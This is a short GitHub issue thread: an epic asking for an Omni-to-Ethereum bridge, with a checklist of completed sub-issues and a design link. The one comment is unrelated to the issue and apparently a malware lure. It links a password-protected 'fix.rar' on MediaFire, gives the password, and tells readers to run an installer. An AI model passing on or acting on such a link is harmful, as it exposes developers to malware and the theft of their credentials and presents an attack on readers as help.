### ISSUE TITLE
EPIC- Complete HIFI's

### ISSUE THREAD

**Issue by CourtneyLinum** [LinumLabs/Omni-tickets#37]
As a user I would like to Bridge from Omni to Ethereum on their test network(Omni Omega) and Mainnet.

### Requirements:

- [x] #38
- [x] #39
- [x] #40
- [x] #41
- [x] #42
- [x] #43
- [x] #44
- [x] #45
- [x] #46
- [x] #47

###RESOURCES:
https://www.figma.com/design/FR0oGZHafgsruvutdDAYS1/Omni-Bridge?node-id=0-1&t=Z8rfUB3J0B23xhLc-1

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
